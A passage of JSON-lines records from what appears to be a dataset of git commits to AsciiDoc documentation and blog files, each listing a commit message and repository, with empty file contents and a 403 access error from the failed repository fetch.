2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28242bf05714a962b67cbf5f9bcef7d64f998b81","subject":"Update Hello World! article","message":"Update Hello World! article\n","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-27-Hello-World!.adoc","new_file":"_posts\/2017-05-27-Hello-World!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b792afa6a2d5e650538e31e1468539a5919c4d57","subject":"Create index-es.adoc","message":"Create index-es.adoc\n\nSpanish translation for index.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/index-es.adoc","new_file":"src\/index-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcbb2899c954cc99f094d336b33cd2f22bd1d189","subject":"add learn clojure answers","message":"add learn clojure answers\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/learn\/answers.adoc","new_file":"content\/guides\/learn\/answers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9733a1eda041991bace5b2eef075876d0c60e400","subject":"Update 2017-06-13-Kotlin-Style-Guides.adoc","message":"Update 2017-06-13-Kotlin-Style-Guides.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-13-Kotlin-Style-Guides.adoc","new_file":"_posts\/2017-06-13-Kotlin-Style-Guides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9efce7dcce380344210e871db0b9e5b9af983de","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3777e3e5ea534819a8ed01b1d397f32df0af4da3","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028ba01f8561a4670ad432f1abc39dd81f6bee6b","subject":"Update generated files","message":"Update generated files\n\nSigned-off-by: Clement Escoffier <6397137e57d1f87002962a37058f2a1c76fca9db@gmail.com>\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/cheatsheet\/HttpClientOptions.adoc","new_file":"rx-java\/src\/main\/asciidoc\/cheatsheet\/HttpClientOptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"437663cca4f59ee72926e1c3a352058b7a03c807","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c8b2a058da8bb9a5713d7db1209c41c466a2b9","subject":"Fixed bug in developer manual","message":"Fixed bug in developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eacb46a31a7c34a263fd56c079d6f0ee182b844a","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nFix \"help wanted\" label link","repos":"ramr\/origin,sjug\/origin,akram\/origin,liangxia\/origin,sjug\/origin,luciddreamz\/origin,jeremyeder\/origin,mfojtik\/origin,hroyrh\/origin,linzhaoming\/origin,tnozicka\/origin,liangxia\/origin,openshift\/origin,liangxia\/origin,pweil-\/origin,dinhxuanvu\/origin,anpingli\/origin,pweil-\/origin,JacobTanenbaum\/origin,spadgett\/origin,soltysh\/origin,luciddreamz\/origin,jeremyeder\/origin,jim-minter\/origin,mkumatag\/origin,pweil-\/origin,aveshagarwal\/origin,spadgett\/origin,aveshagarwal\/origin,imcsk8\/origin,soltysh\/origin,mdshuai\/origin,liangxia\/origin,jim-minter\/origin,markllama\/origin,kargakis\/origin,jeremyeder\/origin,spadgett\/origin,hroyrh\/origin,markllama\/origin,imcsk8\/origin,gabemontero\/origin,ingvagabund\/origin,openshift\/origin,kargakis\/origin,xiuwang\/origin,openshift\/origin,sjug\/origin,JacobTanenbaum\/origin,hroyrh\/origin,jeremyeder\/origin,Miciah\/origin,csrwng\/origin,tnozicka\/origin,linzhaoming\/origin,enj\/origin,coreydaley\/origin,ramr\/origin,pecameron\/origin,childsb\/origin,gabemontero\/origin,deads2k\/origin,mahak\/origin,deads2k\/origin,ingvagabund\/origin,deads2k\/origin,kargakis\/origin,dinhxuanvu\/origin,linzhaoming\/origin,luciddreamz\/origin,sdminonne\/origin,mdshuai\/origin,nak3\/origin,akram\/origin,sallyom\/origin,nak3\/origin,sallyom\/origin,liangxia\/origin,sallyom\/origin,dinhxuanvu\/origin,tnozicka\/origin,luciddreamz\/origin,JacobTanenbaum\/origin,tnozicka\/origin,mfojtik\/origin,sferich888\/origin,mkumatag\/origin,spadgett\/origin,childsb\/origin,mahak\/origin,sdminonne\/origin,jsafrane\/origin,mdshuai\/origin,ramr\/origin,sferich888\/origin,linzhaoming\/origin,jim-minter\/origin,pecameron\/origin,soltysh\/origin,childsb\/origin,childsb\/origin,Miciah\/origin,childsb\/origin,ramr\/origin,markllama\/origin,kargakis\/origin,bparees\/origin,mkumatag\/origin,mdshuai\/origin,csrwng\/origin,mahak\/origin,linzhaoming\/origin,sdminonne\/origin,nak3\/origin,csrwng\/origin,xiuwang\/origin,markllama\/origin,jeremyeder\/origin,sferich888\/origin,ingvagabund\/origin,spadgett\/origin,imcsk8\/origin,aveshagarwal\/origin,childsb\/origin,tnozicka\/origin,enj\/origin,markllama\/origin,akram\/origin,coreydaley\/origin,xiuwang\/origin,imcsk8\/origin,dinhxuanvu\/origin,coreydaley\/origin,kargakis\/origin,luciddreamz\/origin,jsafrane\/origin,ironcladlou\/origin,bparees\/origin,aveshagarwal\/origin,mdshuai\/origin,liangxia\/origin,mdshuai\/origin,Miciah\/origin,bparees\/origin,imcsk8\/origin,anpingli\/origin,ironcladlou\/origin,ramr\/origin,enj\/origin,gabemontero\/origin,markllama\/origin,luciddreamz\/origin,imcsk8\/origin,dinhxuanvu\/origin,pecameron\/origin,tnozicka\/origin,aveshagarwal\/origin,ironcladlou\/origin,mfojtik\/origin,kargakis\/origin,anpingli\/origin,jsafrane\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spadgett\/origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9e0e191b05eea0883b43c1730ba094b5c0bbb98","subject":"KUDU-1211 Document specific steps for Impala_Kudu installation","message":"KUDU-1211 Document specific steps for Impala_Kudu installation\n\nChange-Id: If6871a2dd41525b960a62d210dbd21f5b59fe611\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1270\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-by: Martin Grund <2546548d516fa64c411fde8242af35f3f80ad31f@cloudera.com>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10390a5e50baf75ecc9677cc2f45a082528fef8a","subject":"[DOCS] Forward-fit example output for DELETE model snapshot API","message":"[DOCS] Forward-fit example output for DELETE model snapshot API\n\nOriginal commit: elastic\/x-pack-elasticsearch@d847776203c09d090b07f10eb779dfaa5b90e0d5\n","repos":"gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/delete-snapshot.asciidoc","new_file":"docs\/en\/rest-api\/ml\/delete-snapshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"315e0d715cd61d081401446d26808da5471a3984","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ebd89b7bbac22b7893861b729173065b75d657","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a43b7e862af3832fbec1a50175295fb072684b","subject":"and link it here","message":"and link it here\n\nSigned-off-by: Ricky Elrod <3de8762d49a778edd8b1aa9f381ea5a9ccb62944@elrod.me>\n","repos":"noexc\/mapview,noexc\/mapview","old_file":"doc\/Introduction.adoc","new_file":"doc\/Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noexc\/mapview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ae97c74ac22f3ee6dc2c0315ebb5f5e91364e7","subject":"Update 2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","message":"Update 2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","new_file":"_posts\/2016-02-10-SVN-prevent-doing-proper-code-reviews.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"029dc3f981c17daf3fe3acb62e3b765541d6500d","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"937456894fc55e53b302d01dff01ce4487d18a50","subject":"Update 2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","message":"Update 2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","new_file":"_posts\/2017-03-15-Git-repo-permissions-and-hook-scripts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58523761851893131352bf6e4ddf8e8495b17905","subject":"Update 2015-05-26-TEST.adoc","message":"Update 2015-05-26-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0289a8b787c1663cfde3d07de09bd341f80384","subject":"Update 2016-08-26-Test.adoc","message":"Update 2016-08-26-Test.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-26-Test.adoc","new_file":"_posts\/2016-08-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e913b5979400f79d5c62ab92580b46af3b7d4bf","subject":"CL note: merging pathname","message":"CL note: merging pathname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0af5cd9cd758057911e7f4f20d733e6e9d30b496","subject":"Update 2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","message":"Update 2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","new_file":"_posts\/2015-10-08-Organizaciya-zavisimostej-v-Meteor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78100abcb69d35253c9fbe00b776ede079e07bb9","subject":"y2b create post Who Makes The World's Best Wallet?","message":"y2b create post Who Makes The World's Best Wallet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-04-Who-Makes-The-Worlds-Best-Wallet.adoc","new_file":"_posts\/2017-06-04-Who-Makes-The-Worlds-Best-Wallet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb2a68762a8c71b5723b4aaff77b0ca44cd15acb","subject":"typo's","message":"typo's\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abf8a947d583e867b655fdff4720816887f32384","subject":"Update 2015-07-09-Markdown-test.adoc","message":"Update 2015-07-09-Markdown-test.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-09-Markdown-test.adoc","new_file":"_posts\/2015-07-09-Markdown-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"969bf992dfa5b8f5055761d8bc0d5c80c239e064","subject":"Update 2017-08-13-My-first-post.adoc","message":"Update 2017-08-13-My-first-post.adoc","repos":"karcot\/trial1,karcot\/trial1,karcot\/trial1,karcot\/trial1","old_file":"_posts\/2017-08-13-My-first-post.adoc","new_file":"_posts\/2017-08-13-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/karcot\/trial1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c95135f0b067e5b5f0827256f684cb303ac4855","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"235a97070c520f5d50aba2bc71f0cc8da0693b9f","subject":"Deleted _posts\/2016-11-3-you-know-what.adoc","message":"Deleted _posts\/2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-11-3-you-know-what.adoc","new_file":"_posts\/2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42dd417e6e338ba8b8816a5d554fdedb86754698","subject":"Update 2015-09-27-Reseau-de-neurones.adoc","message":"Update 2015-09-27-Reseau-de-neurones.adoc","repos":"Akanoa\/akanoa.github.io,Akanoa\/akanoa.github.io,Akanoa\/akanoa.github.io","old_file":"_posts\/2015-09-27-Reseau-de-neurones.adoc","new_file":"_posts\/2015-09-27-Reseau-de-neurones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Akanoa\/akanoa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8244d3a19ce3b9d9ff8e3f8dee4d71cdf3a90c18","subject":"Renamed '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Blog-Home.adoc'","message":"Renamed '_posts\/2018-01-09-Your-Blog-Is-Your-Home.adoc' to '_posts\/2018-01-09-Blog-Home.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-Home.adoc","new_file":"_posts\/2018-01-09-Blog-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26ab52e5c494617009ae39a6b314d23c365cd303","subject":"Added news\/2017-02-03-forge-2.5.0.final.asciidoc","message":"Added news\/2017-02-03-forge-2.5.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-02-03-forge-2.5.0.final.asciidoc","new_file":"news\/2017-02-03-forge-2.5.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d01bb02a359b39bef35f8175a0bc95539968f4a","subject":"Added messages docs","message":"Added messages docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"991fe5eccd7fcfeae33125c80e867bc2fcfae600","subject":"Update 2015-07-22-Patrick-Fischer.adoc","message":"Update 2015-07-22-Patrick-Fischer.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-07-22-Patrick-Fischer.adoc","new_file":"_posts\/2015-07-22-Patrick-Fischer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a5a79a5b022e4f50b152ee294d692d51704a081","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcd6427875d76a2462354e7d4cce06531f6054cd","subject":"Added TODO.asciidoc to remember","message":"Added TODO.asciidoc to remember\n","repos":"cos-ht\/cataliner-framework","old_file":"TODO.asciidoc","new_file":"TODO.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cos-ht\/cataliner-framework.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ec24853e6626bd785df89a2fbf8b419ef2ad075","subject":"short documentation on how to request a cert from a Windows CA","message":"short documentation on how to request a cert from a Windows CA\n","repos":"Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,ato\/yubico-piv-tool,hirden\/yubico-piv-tool","old_file":"doc\/Windows-Certificate.asciidoc","new_file":"doc\/Windows-Certificate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4dae835cc4bacfb38dfedbf464daf5299e09eb29","subject":"Update 2017-07-26-Wednesday-July-26-2017.adoc","message":"Update 2017-07-26-Wednesday-July-26-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-26-Wednesday-July-26-2017.adoc","new_file":"_posts\/2017-07-26-Wednesday-July-26-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aa0c4f777f25fdc905beb42166d8d4b19b3bdad","subject":"Publish 2016-7-19-and.adoc","message":"Publish 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba9aace7e292738160db6326dd15571ae9fd9aa","subject":"Update 2017-03-24-Test-Math-Jax.adoc","message":"Update 2017-03-24-Test-Math-Jax.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-03-24-Test-Math-Jax.adoc","new_file":"_posts\/2017-03-24-Test-Math-Jax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 